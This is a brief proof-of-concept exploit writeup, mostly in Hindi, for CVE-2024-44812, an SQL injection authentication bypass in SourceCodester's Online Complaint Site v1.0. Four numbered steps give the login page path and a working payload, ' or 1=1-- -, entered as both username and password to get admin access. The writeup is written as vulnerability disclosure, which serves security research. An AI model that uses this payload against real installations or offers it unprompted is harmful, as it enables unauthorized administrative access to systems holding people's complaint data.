
CVE-2024-44812 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट - ऑनलाइन शिकायत साइट v1.0 में SQL इंजेक्शन प्रमाणीकरण बायपास भेद्यता
SourceCodester
https://www.sourcecodester.com/php/14717/online-complaint-site-using-phpmysqli-full-source-code.html
Online Complaint Site v.1.0 में SQL Injection भेद्यता एक दूरस्थ हमलावर को /admin.index.php घटक में उपयोगकर्ता नाम और पासवर्ड पैरामीटर्स के माध्यम से विशेषाधिकार बढ़ाने की अनुमति देती है।
CVE-2024-44812 के लिए प्रमाण-अवधारणा शोषण - Online Complaint Site v1.0 में SQL Injection प्रमाणीकरण बाईपास भेद्यता
Step 1 – Visit http://localhost/complaintsite/
Step 2 – Click on "admin" button and redirect on login page.
Step 3 – Enter username as ' or 1=1-- - and password as ' or 1=1-- -
Step 4 – Click Login and now you will be logged in as admin.